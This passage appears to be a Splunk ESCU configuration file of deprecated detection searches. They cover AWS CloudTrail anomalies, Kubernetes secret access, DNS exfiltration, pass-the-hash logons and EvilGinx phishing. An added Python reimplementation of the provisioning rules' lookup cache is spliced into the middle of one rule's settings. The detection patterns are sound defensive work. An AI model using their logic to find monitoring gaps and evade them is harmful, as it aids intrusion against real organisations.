search = `cloudtrail` (eventName=Run* OR eventName=Create*) | iplocation sourceIPAddress | search Region=* [search `cloudtrail` (eventName=Run* OR eventName=Create*) | iplocation sourceIPAddress | search Region=* | stats earliest(_time) as firstTime, latest(_time) as lastTime by sourceIPAddress, City, Region, Country | inputlookup append=t previously_seen_provisioning_activity_src.csv | stats min(firstTime) as firstTime max(lastTime) as lastTime by sourceIPAddress, City, Region, Country | outputlookup previously_seen_provisioning_activity_src.csv | stats min(firstTime) as firstTime max(lastTime) as lastTime by Region | eval newRegion=if(firstTime >= relative_time(now(), "-70m@m"), 1, 0) | where newRegion=1 | table Region] | spath output=user userIdentity.arn | rename sourceIPAddress as src_ip | table _time, user, src_ip, Region, eventName, errorCode | `aws_cloud_provisioning_from_previously_unseen_region_filter`

[ESCU - AWS EKS Kubernetes cluster sensitive object access - Rule]
action.escu = 0
action.escu.enabled = 1
description = **WARNING**, this detection has been marked **DEPRECATED** by the Splunk Threat Research Team. This means that it will no longer be maintained or supported. If you have any questions feel free to email us at: research@splunk.com. This search provides information on Kubernetes accounts accessing sensitive objects such as configmaps or secrets.
action.escu.mappings = {"cis20": ["CIS 10"], "nist": ["DE.AE"]}
action.escu.data_models = []
action.escu.eli5 = This search provides information on Kubernetes accounts accessing sensitive objects such as configmaps or secrets.
action.escu.how_to_implement = You must install the Splunk Add-on for Amazon Web Services and the Splunk App for AWS. This search works with EKS control-plane audit logs ingested from CloudWatch Logs (the `aws_cloudwatchlogs_eks` macro).
action.escu.known_false_positives = Sensitive object access is not necessarily malicious, but user and object context can provide guidance for detection.
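The "previously seen" cache pattern shared by the four `AWS Cloud Provisioning From Previously Unseen City/Country/IP Address/Region` searches above, re-implemented in Python as an added example that is not Splunk's code and not part of the ESCU content. The subsearch in each rule folds the current window into `previously_seen_provisioning_activity_src.csv` with `inputlookup append=t` / `outputlookup`, then reports values of one geolocation level whose earliest `firstTime` falls inside the 70-minute window. Here the lookup file is an in-memory dict, `iplocation` is a constructed lookup table, and the CloudTrail records, ARNs and addresses are invented. The example generalises the four rules into one function parameterised by level.

```python
from datetime import datetime, timedelta, timezone

NOW = datetime(2024, 4, 17, 22, 0, tzinfo=timezone.utc)   # wall clock of the scheduled run

# Constructed stand-in for the MaxMind GeoIP lookup that `iplocation` performs.
GEOIP = {
    "203.0.113.10": ("Seattle", "Washington", "United States"),
    "203.0.113.11": ("Seattle", "Washington", "United States"),
    "198.51.100.7": ("Abuja", "Federal Capital Territory", "Nigeria"),
}
LEVELS = {"src_ip": 0, "City": 1, "Region": 2, "Country": 3}   # column index in the cache key

# Stand-in for previously_seen_provisioning_activity_src.csv:
# (sourceIPAddress, City, Region, Country) -> (firstTime, lastTime)
SEED_CACHE = {
    ("203.0.113.10", "Seattle", "Washington", "United States"):
        (NOW - timedelta(days=30), NOW - timedelta(days=1)),
}

# Constructed CloudTrail records inside the current search window.
SAMPLE_EVENTS = [
    {"eventTime": (NOW - timedelta(minutes=20)).isoformat(), "eventName": "RunInstances",
     "sourceIPAddress": "203.0.113.11", "userIdentity": {"arn": "arn:aws:iam::123456789012:user/alice"}},
    {"eventTime": (NOW - timedelta(minutes=15)).isoformat(), "eventName": "CreateUser",
     "sourceIPAddress": "198.51.100.7", "errorCode": "AccessDenied",   # failed attempts are still reported
     "userIdentity": {"arn": "arn:aws:sts::123456789012:assumed-role/Admin/mallory"}},
    {"eventTime": (NOW - timedelta(minutes=14)).isoformat(), "eventName": "DescribeInstances",
     "sourceIPAddress": "198.51.100.7",                                 # not provisioning: ignored
     "userIdentity": {"arn": "arn:aws:sts::123456789012:assumed-role/Admin/mallory"}},
    {"eventTime": (NOW - timedelta(minutes=10)).isoformat(), "eventName": "RunInstances",
     "sourceIPAddress": "203.0.113.10", "userIdentity": {"arn": "arn:aws:iam::123456789012:user/alice"}},
]


def is_provisioning(event_name):
    return event_name.startswith(("Run", "Create"))   # (eventName=Run* OR eventName=Create*)


def cache_key(ev):
    """(sourceIPAddress, City, Region, Country), or None when GeoIP cannot resolve the
    address; the subsearch's `search City=*` / `Country=*` / `Region=*` drops such events."""
    geo = GEOIP.get(ev["sourceIPAddress"])
    return None if geo is None else (ev["sourceIPAddress"],) + geo


def update_cache(cache, events):
    """stats earliest/latest by key | inputlookup append=t | stats min/max by key | outputlookup"""
    for ev in events:
        key = cache_key(ev)
        if key is None or not is_provisioning(ev["eventName"]):
            continue
        t = datetime.fromisoformat(ev["eventTime"])
        first, last = cache.get(key, (t, t))
        cache[key] = (min(first, t), max(last, t))
    return cache


def newly_seen(cache, level, window_start):
    """Values of `level` whose earliest firstTime over all cache rows lies in the window
    (stats min(firstTime) by <level> | eval new=if(firstTime >= -70m@m, 1, 0))."""
    idx = LEVELS[level]
    first_by_value = {}
    for key, (first, _last) in cache.items():
        first_by_value[key[idx]] = min(first, first_by_value.get(key[idx], first))
    return {v for v, first in first_by_value.items() if first >= window_start}


def detect(events, cache, level, now):
    """One scheduled run: fold the window into the cache, then return every provisioning
    event whose <level> value was first seen in this window (the outer search joined
    to the subsearch's table of new values)."""
    window_start = now.replace(second=0, microsecond=0) - timedelta(minutes=70)
    new_values = newly_seen(update_cache(cache, events), level, window_start)
    idx = LEVELS[level]
    hits = []
    for ev in events:
        key = cache_key(ev)
        if key is None or not is_provisioning(ev["eventName"]) or key[idx] not in new_values:
            continue
        hits.append((ev["eventTime"], ev["userIdentity"]["arn"], ev["sourceIPAddress"],
                     level, key[idx], ev["eventName"], ev.get("errorCode", "success")))
    return hits


if __name__ == "__main__":
    for level in LEVELS:
        print(level, detect(SAMPLE_EVENTS, dict(SEED_CACHE), level, NOW))
```

Running the same window at each level shows why the four rules differ in noise: the new Seattle address `203.0.113.11` fires only at the `src_ip` level, because its city, region and country were already in the cache, while the Abuja `CreateUser` attempt fires at every level. Two properties carry over from the SPL: the cache is updated on every run, so an address or location alerts only on the run in which it is first seen (a second run over the same events returns nothing), and an address that GeoIP cannot resolve never surfaces, even in the IP-address rule, because its subsearch still requires `Country=*`.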
action.escu.creation_date = 2020-06-23 action.escu.modification_date = 2020-06-23 action.escu.confidence = high action.escu.full_search_name = ESCU - AWS EKS Kubernetes cluster sensitive object access - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = null action.escu.analytic_story = ["Kubernetes Sensitive Object Access Activity"] cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Deprecated - AWS EKS Kubernetes cluster sensitive object access - Rule action.correlationsearch.annotations = {"analytic_story": ["Kubernetes Sensitive Object Access Activity"], "cis20": ["CIS 10"], "confidence": 50, "impact": 50, "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `aws_cloudwatchlogs_eks` objectRef.resource=secrets OR configmaps sourceIPs{}!=::1 sourceIPs{}!=127.0.0.1 |table sourceIPs{} user.username user.groups{} objectRef.resource objectRef.namespace objectRef.name annotations.authorization.k8s.io/reason |dedup user.username user.groups{} |`aws_eks_kubernetes_cluster_sensitive_object_access_filter` [ESCU - Clients Connecting to Multiple DNS Servers - Rule] action.escu = 0 action.escu.enabled = 1 description = **WARNING**, this detection has been marked **DEPRECATED** by the Splunk Threat Research Team. This means that it will no longer be maintained or supported. If you have any questions feel free to email us at: research@splunk.com. This search allows you to identify the endpoints that have connected to more than five DNS servers and made DNS Queries over the time frame of the search. 
action.escu.mappings = {"cis20": ["CIS 13"], "kill_chain_phases": ["Actions on Objectives"], "mitre_attack": ["T1048.003"], "nist": ["DE.CM"]} action.escu.data_models = ["Network_Resolution"] action.escu.eli5 = This search allows you to identify the endpoints that have connected to more than five DNS servers and made DNS Queries over the time frame of the search. action.escu.how_to_implement = This search requires that DNS data is being ingested and populating the `Network_Resolution` data model. This data can come from DNS logs or from solutions that parse network traffic for this data, such as Splunk Stream or Bro.\ This search produces fields (`dest_count`) that are not yet supported by ES Incident Review and therefore cannot be viewed when a notable event is raised. These fields contribute additional context to the notable. To see the additional metadata, add the following fields, if not already present, to Incident Review - Event Attributes (Configure > Incident Management > Incident Review Settings > Add New Entry):\\n1. **Label:** Distinct DNS Connections, **Field:** dest_count\ Detailed documentation on how to create a new field within Incident Review may be found here: `https://docs.splunk.com/Documentation/ES/5.3.0/Admin/Customizenotables#Add_a_field_to_the_notable_event_details` action.escu.known_false_positives = It's possible that an enterprise has more than five DNS servers that are configured in a round-robin rotation. Please customize the search, as appropriate. 
action.escu.creation_date = 2020-07-21 action.escu.modification_date = 2020-07-21 action.escu.confidence = high action.escu.full_search_name = ESCU - Clients Connecting to Multiple DNS Servers - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = null action.escu.analytic_story = ["DNS Hijacking", "Suspicious DNS Traffic", "Host Redirection", "Command And Control"] action.risk = 1 action.risk.param._risk_message = tbd action.risk.param._risk = [{"risk_object_field": "field", "risk_object_type": "other", "risk_score": 25}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Deprecated - Clients Connecting to Multiple DNS Servers - Rule action.correlationsearch.annotations = {"analytic_story": ["DNS Hijacking", "Suspicious DNS Traffic", "Host Redirection", "Command And Control"], "cis20": ["CIS 13"], "confidence": 50, "impact": 50, "kill_chain_phases": ["Actions on Objectives"], "mitre_attack": ["T1048.003"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = This search allows you to identify the endpoints that have connected to more than five DNS servers and made DNS Queries over the time frame of the search. 
action.notable.param.rule_title = Clients Connecting to Multiple DNS Servers action.notable.param.security_domain = network action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count, values(DNS.dest) AS dest dc(DNS.dest) as dest_count from datamodel=Network_Resolution where DNS.message_type=QUERY by DNS.src | `drop_dm_object_name("Network_Resolution")` |where dest_count > 5 | `clients_connecting_to_multiple_dns_servers_filter` [ESCU - Cloud Network Access Control List Deleted - Rule] action.escu = 0 action.escu.enabled = 1 description = **WARNING**, this detection has been marked **DEPRECATED** by the Splunk Threat Research Team. This means that it will no longer be maintained or supported. If you have any questions feel free to email us at: research@splunk.com. Enforcing network-access controls is one of the defensive mechanisms used by cloud administrators to restrict access to a cloud instance. After the attacker has gained control of the console by compromising an admin account, they can delete a network ACL and gain access to the instance from anywhere. This search will query the Change datamodel to detect users deleting network ACLs. Deprecated because it's a duplicate action.escu.mappings = {"cis20": ["CIS 13"], "nist": ["DE.AE"]} action.escu.data_models = [] action.escu.eli5 = Enforcing network-access controls is one of the defensive mechanisms used by cloud administrators to restrict access to a cloud instance. After the attacker has gained control of the console by compromising an admin account, they can delete a network ACL and gain access to the instance from anywhere. This search will query the Change datamodel to detect users deleting network ACLs. 
Deprecated because it's a duplicate action.escu.how_to_implement = You must be ingesting your cloud infrastructure logs from your cloud provider. You can also provide additional filtering for this search by customizing the `cloud_network_access_control_list_deleted_filter` macro. action.escu.known_false_positives = It's possible that a user has legitimately deleted a network ACL. action.escu.creation_date = 2020-09-08 action.escu.modification_date = 2020-09-08 action.escu.confidence = high action.escu.full_search_name = ESCU - Cloud Network Access Control List Deleted - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Amazon Web Services - Cloudtrail"] action.escu.analytic_story = ["Cloud Network ACL Activity"] action.risk = 1 action.risk.param._risk_message = tbd action.risk.param._risk = [{"risk_object_field": "field", "risk_object_type": "other", "risk_score": 25}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Deprecated - Cloud Network Access Control List Deleted - Rule action.correlationsearch.annotations = {"analytic_story": ["Cloud Network ACL Activity"], "cis20": ["CIS 13"], "confidence": 50, "impact": 50, "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `cloudtrail` eventName=DeleteNetworkAcl|rename userIdentity.arn as arn | stats count min(_time) as firstTime max(_time) as lastTime values(errorMessage) values(errorCode) values(userAgent) values(userIdentity.*) by src userName arn eventName | `security_content_ctime(lastTime)` | `security_content_ctime(firstTime)` | 
`cloud_network_access_control_list_deleted_filter` [ESCU - Correlation by Repository and Risk - Rule] action.escu = 0 action.escu.enabled = 1 description = **WARNING**, this detection has been marked **DEPRECATED** by the Splunk Threat Research Team. This means that it will no longer be maintained or supported. If you have any questions feel free to email us at: research@splunk.com. This search has been deprecated and updated with Risk Rule for Dev Sec Ops by Repository detection. The following analytic detects by correlating repository and risk score to identify patterns and trends in the data based on the level of risk associated. The analytic adds any null values and calculates the sum of the risk scores for each detection. Then, the analytic captures the source and user information for each detection and sorts the results in ascending order based on the risk score. Finally, the analytic filters the detections with a risk score below 80 and focuses only on high-risk detections.This detection is important because it provides valuable insights into the distribution of high-risk activities across different repositories. It also identifies the most vulnerable repositories that are frequently targeted by potential threats. Additionally, it proactively detects and responds to potential threats, thereby minimizing the impact of attacks and safeguarding critical assets. Finally, it provides a comprehensive view of the risk landscape and helps to make informed decisions to protect the organization's data and infrastructure. False positives might occur so it is important to identify the impact of the attack and prioritize response and mitigation efforts. action.escu.mappings = {"cis20": ["CIS 13"], "kill_chain_phases": ["Installation"], "mitre_attack": ["T1204.003", "T1204"], "nist": ["DE.AE"]} action.escu.data_models = [] action.escu.eli5 = This search has been deprecated and updated with Risk Rule for Dev Sec Ops by Repository detection. 
The following analytic detects by correlating repository and risk score to identify patterns and trends in the data based on the level of risk associated. The analytic adds any null values and calculates the sum of the risk scores for each detection. Then, the analytic captures the source and user information for each detection and sorts the results in ascending order based on the risk score. Finally, the analytic filters the detections with a risk score below 80 and focuses only on high-risk detections.This detection is important because it provides valuable insights into the distribution of high-risk activities across different repositories. It also identifies the most vulnerable repositories that are frequently targeted by potential threats. Additionally, it proactively detects and responds to potential threats, thereby minimizing the impact of attacks and safeguarding critical assets. Finally, it provides a comprehensive view of the risk landscape and helps to make informed decisions to protect the organization's data and infrastructure. False positives might occur so it is important to identify the impact of the attack and prioritize response and mitigation efforts. 
action.escu.how_to_implement = For Dev Sec Ops POC action.escu.known_false_positives = unknown action.escu.creation_date = 2021-09-06 action.escu.modification_date = 2021-09-06 action.escu.confidence = high action.escu.full_search_name = ESCU - Correlation by Repository and Risk - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = null action.escu.analytic_story = ["Dev Sec Ops"] cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Deprecated - Correlation by Repository and Risk - Rule action.correlationsearch.annotations = {"analytic_story": ["Dev Sec Ops"], "cis20": ["CIS 13"], "confidence": 100, "impact": 70, "kill_chain_phases": ["Installation"], "mitre_attack": ["T1204.003", "T1204"], "nist": ["DE.AE"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = This search has been deprecated and updated with Risk Rule for Dev Sec Ops by Repository detection. The following analytic detects by correlating repository and risk score to identify patterns and trends in the data based on the level of risk associated. The analytic adds any null values and calculates the sum of the risk scores for each detection. Then, the analytic captures the source and user information for each detection and sorts the results in ascending order based on the risk score. Finally, the analytic filters the detections with a risk score below 80 and focuses only on high-risk detections.This detection is important because it provides valuable insights into the distribution of high-risk activities across different repositories. It also identifies the most vulnerable repositories that are frequently targeted by potential threats. 
Additionally, it proactively detects and responds to potential threats, thereby minimizing the impact of attacks and safeguarding critical assets. Finally, it provides a comprehensive view of the risk landscape and helps to make informed decisions to protect the organization's data and infrastructure. False positives might occur so it is important to identify the impact of the attack and prioritize response and mitigation efforts. action.notable.param.rule_title = RBA: Correlation by Repository and Risk action.notable.param.security_domain = network action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `risk_index` | fillnull | stats sum(risk_score) as risk_score values(source) as signals values(user) as user by repository | sort - risk_score | where risk_score > 80 | `correlation_by_repository_and_risk_filter` [ESCU - Correlation by User and Risk - Rule] action.escu = 0 action.escu.enabled = 1 description = **WARNING**, this detection has been marked **DEPRECATED** by the Splunk Threat Research Team. This means that it will no longer be maintained or supported. If you have any questions feel free to email us at: research@splunk.com. The following analytic detects the correlation between the user and risk score and identifies users with a high risk score that pose a significant security risk such as unauthorized access attempts, suspicious behavior, or potential insider threats. Next, the analytic calculates the sum of the risk scores and groups the results by user, the corresponding signals, and the repository. The results are sorted in descending order based on the risk score and filtered to include records with a risk score greater than 80. Finally, the results are passed through a correlation filter specific to the user and risk. 
This detection is important because it identifies users who have a high risk score and helps to prioritize investigations and allocate resources. False positives might occur but the impact of such an attack can vary depending on the specific scenario such as data exfiltration, system compromise, or the disruption of critical services. Please investigate this notable event. action.escu.mappings = {"cis20": ["CIS 13"], "kill_chain_phases": ["Installation"], "mitre_attack": ["T1204.003", "T1204"], "nist": ["DE.AE"]} action.escu.data_models = [] action.escu.eli5 = The following analytic detects the correlation between the user and risk score and identifies users with a high risk score that pose a significant security risk such as unauthorized access attempts, suspicious behavior, or potential insider threats. Next, the analytic calculates the sum of the risk scores and groups the results by user, the corresponding signals, and the repository. The results are sorted in descending order based on the risk score and filtered to include records with a risk score greater than 80. Finally, the results are passed through a correlation filter specific to the user and risk. This detection is important because it identifies users who have a high risk score and helps to prioritize investigations and allocate resources. False positives might occur but the impact of such an attack can vary depending on the specific scenario such as data exfiltration, system compromise, or the disruption of critical services. Please investigate this notable event. 
action.escu.how_to_implement = For Dev Sec Ops POC action.escu.known_false_positives = unknown action.escu.creation_date = 2021-09-06 action.escu.modification_date = 2021-09-06 action.escu.confidence = high action.escu.full_search_name = ESCU - Correlation by User and Risk - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = null action.escu.analytic_story = ["Dev Sec Ops"] cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Deprecated - Correlation by User and Risk - Rule action.correlationsearch.annotations = {"analytic_story": ["Dev Sec Ops"], "cis20": ["CIS 13"], "confidence": 100, "impact": 70, "kill_chain_phases": ["Installation"], "mitre_attack": ["T1204.003", "T1204"], "nist": ["DE.AE"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = The following analytic detects the correlation between the user and risk score and identifies users with a high risk score that pose a significant security risk such as unauthorized access attempts, suspicious behavior, or potential insider threats. Next, the analytic calculates the sum of the risk scores and groups the results by user, the corresponding signals, and the repository. The results are sorted in descending order based on the risk score and filtered to include records with a risk score greater than 80. Finally, the results are passed through a correlation filter specific to the user and risk. This detection is important because it identifies users who have a high risk score and helps to prioritize investigations and allocate resources. 
False positives might occur but the impact of such an attack can vary depending on the specific scenario such as data exfiltration, system compromise, or the disruption of critical services. Please investigate this notable event. action.notable.param.rule_title = RBA: Correlation by User and Risk action.notable.param.security_domain = network action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `risk_index` | fillnull | stats sum(risk_score) as risk_score values(source) as signals values(repository) as repository by user | sort - risk_score | where risk_score > 80 | `correlation_by_user_and_risk_filter` [ESCU - Detect Activity Related to Pass the Hash Attacks - Rule] action.escu = 0 action.escu.enabled = 1 description = **WARNING**, this detection has been marked **DEPRECATED** by the Splunk Threat Research Team. This means that it will no longer be maintained or supported. If you have any questions feel free to email us at: research@splunk.com. This search looks for specific authentication events from the Windows Security Event logs to detect potential attempts at using the Pass-the-Hash technique. This search is DEPRECATED as it is possible for event code 4624 to generate a high level of noise, as legitimate logon events may also trigger this event code. This can be especially true in environments with high levels of user activity, such as those with many concurrent logons or frequent logon attempts. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1550", "T1550.002"], "nist": ["DE.AE"]} action.escu.data_models = [] action.escu.eli5 = This search looks for specific authentication events from the Windows Security Event logs to detect potential attempts at using the Pass-the-Hash technique. 
This search is DEPRECATED as it is possible for event code 4624 to generate a high level of noise, as legitimate logon events may also trigger this event code. This can be especially true in environments with high levels of user activity, such as those with many concurrent logons or frequent logon attempts. action.escu.how_to_implement = To successfully implement this search, you must ingest your Windows Security Event logs and leverage the latest TA for Windows. action.escu.known_false_positives = Legitimate logon activity by authorized NTLM systems may be detected by this search. Please investigate as appropriate. action.escu.creation_date = 2020-10-15 action.escu.modification_date = 2020-10-15 action.escu.confidence = high action.escu.full_search_name = ESCU - Detect Activity Related to Pass the Hash Attacks - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Microsoft Windows"] action.escu.analytic_story = ["Active Directory Lateral Movement"] cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Deprecated - Detect Activity Related to Pass the Hash Attacks - Rule action.correlationsearch.annotations = {"analytic_story": ["Active Directory Lateral Movement"], "cis20": ["CIS 10"], "confidence": 70, "impact": 70, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1550", "T1550.002"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `wineventlog_security` EventCode=4624 (Logon_Type=3 Logon_Process=NtLmSsp NOT AccountName="ANONYMOUS LOGON") OR (Logon_Type=9 Logon_Process=seclogo) | fillnull | stats count min(_time) as firstTime max(_time) as lastTime by 
EventCode, Logon_Type, WorkstationName, user, dest | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `detect_activity_related_to_pass_the_hash_attacks_filter` [ESCU - Detect API activity from users without MFA - Rule] action.escu = 0 action.escu.enabled = 1 description = **WARNING**, this detection has been marked **DEPRECATED** by the Splunk Threat Research Team. This means that it will no longer be maintained or supported. If you have any questions feel free to email us at: research@splunk.com. This search looks for AWS CloudTrail events where a user logged into the AWS account, is making API calls and has not enabled Multi Factor authentication. Multi factor authentication adds a layer of security by forcing the users to type a unique authentication code from an approved authentication device when they access AWS websites or services. AWS Best Practices recommend that you enable MFA for privileged IAM users. action.escu.mappings = {"cis20": ["CIS 13"], "nist": ["DE.AE"]} action.escu.data_models = [] action.escu.eli5 = This search looks for AWS CloudTrail events where a user logged into the AWS account, is making API calls and has not enabled Multi Factor authentication. Multi factor authentication adds a layer of security by forcing the users to type a unique authentication code from an approved authentication device when they access AWS websites or services. AWS Best Practices recommend that you enable MFA for privileged IAM users. action.escu.how_to_implement = You must install the AWS App for Splunk (version 5.1.0 or later) and Splunk Add-on for AWS (version 4.4.0 or later), then configure your AWS CloudTrail inputs. 
Leverage the support search `Create a list of approved AWS service accounts`: run it once every 30 days to create a list of service accounts and validate them.\ This search produces fields (`eventName`,`userIdentity.type`,`userIdentity.arn`) that are not yet supported by ES Incident Review and therefore cannot be viewed when a notable event is raised. These fields contribute additional context to the notable. To see the additional metadata, add the following fields, if not already present, to Incident Review - Event Attributes (Configure > Incident Management > Incident Review Settings > Add New Entry):\\n1. **Label:** AWS Event Name, **Field:** eventName\ 1. \ 1. **Label:** AWS User ARN, **Field:** userIdentity.arn\ 1. \ 1. **Label:** AWS User Type, **Field:** userIdentity.type\ Detailed documentation on how to create a new field within Incident Review may be found here: `https://docs.splunk.com/Documentation/ES/5.3.0/Admin/Customizenotables#Add_a_field_to_the_notable_event_details` action.escu.known_false_positives = Many service accounts configured within an AWS infrastructure do not have multi factor authentication enabled. Please ignore the service accounts, if triggered and instead add them to the aws_service_accounts.csv file to fine tune the detection. It is also possible that the search detects users in your environment using Single Sign-On systems, since the MFA is not handled by AWS. 
action.escu.creation_date = 2018-05-17 action.escu.modification_date = 2018-05-17 action.escu.confidence = high action.escu.full_search_name = ESCU - Detect API activity from users without MFA - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Amazon Web Services - Cloudtrail"] action.escu.analytic_story = ["AWS User Monitoring"] cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Deprecated - Detect API activity from users without MFA - Rule action.correlationsearch.annotations = {"analytic_story": ["AWS User Monitoring"], "cis20": ["CIS 13"], "confidence": 50, "impact": 50, "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `cloudtrail` userIdentity.sessionContext.attributes.mfaAuthenticated=false | search NOT [| inputlookup aws_service_accounts | fields identity | rename identity as user]| stats count min(_time) as firstTime max(_time) as lastTime values(eventName) as eventName by userIdentity.arn userIdentity.type user | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `detect_api_activity_from_users_without_mfa_filter` [ESCU - Detect AWS API Activities From Unapproved Accounts - Rule] action.escu = 0 action.escu.enabled = 1 description = **WARNING**, this detection has been marked **DEPRECATED** by the Splunk Threat Research Team. This means that it will no longer be maintained or supported. If you have any questions feel free to email us at: research@splunk.com. This search looks for successful AWS CloudTrail activity by user accounts that are not listed in the identity table or `aws_service_accounts.csv`. 
It returns event names and count, as well as the first and last time a specific user or service is detected, grouped by users. Deprecated because managing this list can be quite hard.
action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation", "Delivery", "Installation"], "mitre_attack": ["T1078.004"], "nist": ["DE.AE"]}
action.escu.data_models = []
action.escu.eli5 = This search looks for successful AWS CloudTrail activity by user accounts that are not listed in the identity table or `aws_service_accounts.csv`. It returns event names and count, as well as the first and last time a specific user or service is detected, grouped by users. Deprecated because managing this list can be quite hard.
action.escu.how_to_implement = You must install the AWS App for Splunk (version 5.1.0 or later) and Splunk Add-on for AWS (version 4.4.0 or later), then configure your AWS CloudTrail inputs. You must also populate the `identity_lookup_expanded` lookup shipped with the Asset and Identity framework to be able to look up users in your identity table in Enterprise Security (ES). Leverage the support search called "Create a list of approved AWS service accounts": run it once every 30 days to create and validate a list of service accounts.\
This search produces fields (`eventName`, `firstTime`, `lastTime`) that are not yet supported by ES Incident Review and therefore cannot be viewed when a notable event is raised. These fields contribute additional context to the notable. To see the additional metadata, add the following fields, if not already present, to Incident Review - Event Attributes (Configure > Incident Management > Incident Review Settings > Add New Entry):\
1. **Label:** AWS Event Name, **Field:** eventName\
2. **Label:** First Time, **Field:** firstTime\
3. **Label:** Last Time, **Field:** lastTime\
Detailed documentation on how to create a new field within Incident Review may be found here: `https://docs.splunk.com/Documentation/ES/5.3.0/Admin/Customizenotables#Add_a_field_to_the_notable_event_details`
action.escu.known_false_positives = It's likely that you'll find activity detected by users/service accounts that are not listed in the `identity_lookup_expanded` or `aws_service_accounts.csv` file. If the user is a legitimate service account, update the `aws_service_accounts.csv` table with that entry.
action.escu.creation_date = 2020-07-21
action.escu.modification_date = 2020-07-21
action.escu.confidence = high
action.escu.full_search_name = ESCU - Detect AWS API Activities From Unapproved Accounts - Rule
action.escu.search_type = detection
action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"]
action.escu.providing_technologies = ["Amazon Web Services - Cloudtrail"]
action.escu.analytic_story = ["AWS User Monitoring"]
cron_schedule = 0 * * * *
dispatch.earliest_time = -70m@m
dispatch.latest_time = -10m@m
action.correlationsearch.enabled = 1
action.correlationsearch.label = ESCU - Deprecated - Detect AWS API Activities From Unapproved Accounts - Rule
action.correlationsearch.annotations = {"analytic_story": ["AWS User Monitoring"], "cis20": ["CIS 10"], "confidence": 50, "impact": 50, "kill_chain_phases": ["Exploitation", "Delivery", "Installation"], "mitre_attack": ["T1078.004"], "nist": ["DE.AE"]}
schedule_window = auto
alert.digest_mode = 1
disabled = true
enableSched = 1
allow_skew = 100%
counttype = number of events
relation = greater than
quantity = 0
realtime_schedule = 0
is_visible = false
search = `cloudtrail` errorCode=success | rename userName as identity | search NOT [| inputlookup identity_lookup_expanded | fields identity] | search NOT [| inputlookup aws_service_accounts | fields identity] | rename identity as user | stats count min(_time) as firstTime max(_time) as lastTime values(eventName) as eventName by user | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `detect_aws_api_activities_from_unapproved_accounts_filter`

[ESCU - Detect DNS requests to Phishing Sites leveraging EvilGinx2 - Rule]
action.escu = 0
action.escu.enabled = 1
description = **WARNING**, this detection has been marked **DEPRECATED** by the Splunk Threat Research Team. This means that it will no longer be maintained or supported. If you have any questions feel free to email us at: research@splunk.com. This search looks for DNS requests for phishing domains that are leveraging EvilGinx tools to mimic websites.
